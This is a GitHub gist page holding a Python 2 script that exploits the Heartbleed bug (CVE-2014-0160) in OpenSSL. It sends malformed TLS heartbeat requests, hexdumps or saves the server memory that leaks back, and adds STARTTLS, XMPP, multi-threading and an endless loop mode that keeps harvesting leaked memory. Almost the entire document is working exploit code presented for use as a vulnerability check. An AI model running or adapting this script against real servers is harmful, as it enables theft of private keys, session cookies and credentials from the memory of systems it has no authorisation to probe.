-
-
Save tahajahangir/10396581 to your computer and use it in GitHub Desktop.
Added threading/loop support (serveral features from different forks also added)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
# The author disclaims copyright to this source code. | |
# Modifed to send heartbeat requests for both TLS v1.1 and v1.2 | |
import sys | |
import struct | |
import socket | |
import threading | |
import time | |
import select | |
import re | |
from optparse import OptionParser | |
dump_lock = threading.Lock() | |
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') | |
options.add_option('-p', '--port', type='int', default=443, help='Port to test (default: 443)') | |
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS') | |
options.add_option('-u', '--udp', action='store_true', default=False, help='Use UDP instead of TCP (default: False)') | |
options.add_option('-r', '--dump', action='store_true', default=False, help='Dump response to response.dat (default: False)') | |
options.add_option('--dump-file', default='response.dat', help='dump file filename (default:response.dat') | |
options.add_option('-x', '--xmpp', action='store_true', default=False, help='Check XMPP STARTTLS') | |
options.add_option('-t', '--to', dest='hostname', help='Use given host name in XMPP') | |
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') | |
options.add_option('--threads', type='int', default=1, help='Threads to run (default=1)') | |
options.add_option('--loop', action='store_true', default=False, help='Do check for ever') | |
options.add_option('--tls1', action='store_true', default=False, help='Send for TLS1.1 (default is TLS1.2)') | |
def h2bin(x): | |
return x.replace(' ', '').replace('\n', '').decode('hex') | |
hello = h2bin(''' | |
16 03 02 00 dc 01 00 00 d8 03 02 53 | |
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf | |
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 | |
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 | |
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c | |
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 | |
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 | |
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c | |
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 | |
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 | |
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 | |
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 | |
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 | |
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 | |
00 0f 00 01 01 | |
''') | |
#heartbeat request for TLS v1.2 | |
hb = h2bin(''' | |
18 03 02 00 03 | |
01 ff ff | |
''') | |
#heartbeat request for TLS v1.1 | |
hbv11 = h2bin(''' | |
18 03 01 00 03 | |
01 ff ff | |
''') | |
def hexdump_squashed(s): | |
for b in xrange(0, len(s), 16): | |
lin = [c for c in s[b : b + 16]] | |
hxdat = ' '.join('%02X' % ord(c) for c in lin) | |
if hxdat == "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00": | |
if allnulls == 1: | |
continue | |
hxdat = '...' | |
allnulls = 1 | |
pdat = '' | |
else: | |
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) | |
allnulls = 0 | |
print ' %04x: %-48s %s' % (b, hxdat, pdat) | |
def recvall(s, length, timeout=5): | |
endtime = time.time() + timeout | |
rdata = '' | |
remain = length | |
while remain > 0: | |
rtime = endtime - time.time() | |
if rtime < 0: | |
return None | |
r, w, e = select.select([s], [], [], 5) | |
if s in r: | |
data = s.recv(remain) | |
# EOF? | |
if not data: | |
return None | |
rdata += data | |
remain -= len(data) | |
return rdata | |
def recvmsg(s): | |
hdr = recvall(s, 5) | |
if hdr is None: | |
print 'Unexpected EOF receiving record header - server closed connection' | |
return None, None, None | |
typ, ver, ln = struct.unpack('>BHH', hdr) | |
pay = recvall(s, ln, 10) | |
if pay is None: | |
print 'Unexpected EOF receiving record payload - server closed connection' | |
return None, None, None | |
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) | |
return typ, ver, pay | |
def hit_hb(s, opts): | |
s.send(hb) | |
while True: | |
typ, ver, pay = recvmsg(s) | |
if typ is None: | |
print 'No heartbeat response received, server likely not vulnerable' | |
return False | |
if typ == 24: | |
print 'Received heartbeat response:' | |
if opts.dump: | |
with dump_lock: | |
with open(opts.dump_file, "a") as dump: | |
dump.write(pay) | |
else: | |
hexdump_squashed(pay) | |
if len(pay) > 3: | |
print 'WARNING: server returned more data than it should - server is vulnerable!' | |
else: | |
print 'Server processed malformed heartbeat, but did not return any extra data.' | |
return True | |
if typ == 21: | |
print 'Received alert:' | |
hexdump_squashed(pay) | |
print 'Server returned error, likely not vulnerable' | |
return False | |
def check(host, opts): | |
if opts.udp: | |
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
else: | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
print 'Connecting...' | |
sys.stdout.flush() | |
s.connect((host, opts.port)) | |
if opts.starttls: | |
re = s.recv(4096) | |
if opts.debug: print re | |
s.send('ehlo starttlstest\n') | |
re = s.recv(1024) | |
if opts.debug: print re | |
if not 'STARTTLS' in re: | |
if opts.debug: print re | |
print 'STARTTLS not supported...' | |
sys.exit(0) | |
s.send('starttls\n') | |
re = s.recv(1024) | |
if opts.xmpp: | |
s.send('<stream:stream xmlns="jabber:client" version="1.0" xmlns:stream="http://etherx.jabber.org/streams" to="%s">' % (opts.hostname or host)) | |
re = s.recv(4096) | |
while not '<stream:features' in re: | |
if opts.debug: print re | |
re = s.recv(4096) | |
if opts.debug: print re | |
if not 'urn:ietf:params:xml:ns:xmpp-tls' in re: | |
print 'STARTTLS not supported...' | |
sys.exit(0) | |
s.send('<starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"/>') | |
re = s.recv(4096) | |
if opts.debug: print re | |
print 'Sending Client Hello...' | |
sys.stdout.flush() | |
s.send(hello) | |
print 'Waiting for Server Hello...' | |
sys.stdout.flush() | |
while True: | |
typ, ver, pay = recvmsg(s) | |
if typ == None: | |
print 'Server closed connection without sending Server Hello.' | |
return | |
# Look for server hello done message. | |
if typ == 22 and ord(pay[0]) == 0x0E: | |
break | |
print '\nSending heartbeat request for TLS v1.{}...'.format('1' if opts.tls1 else '2') | |
sys.stdout.flush() | |
s.send(hbv11 if opts.tls1 else hb) | |
hit_hb(s, opts) | |
def main(): | |
opts, args = options.parse_args() | |
host = args[0] | |
if len(args) < 1: | |
options.print_help() | |
return | |
if not opts.loop: | |
check(host, opts) | |
else: | |
def do_in_thread(): | |
while True: | |
check(host, opts) | |
for _ in range(opts.threads): | |
t = threading.Thread(target=do_in_thread) | |
t.daemon = True | |
t.start() | |
try: | |
while True: | |
time.sleep(100) | |
except (KeyboardInterrupt, SystemExit): | |
print '\n! Received keyboard interrupt, quitting threads.' | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment